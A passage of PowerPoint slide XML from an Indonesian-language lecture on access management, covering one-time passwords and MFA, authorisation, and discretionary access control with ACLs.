              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> expired </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>replay attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>OTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, SMS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> app (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Google Authenticator), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>multi-factor authentication (MFA).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19567426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Otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperhitungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disalahgunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Diskresioner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Wajib</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialokasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan data. Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip-prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Diskresi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskresioner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (DAC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keutamaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam model DAC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (ACL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>DAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
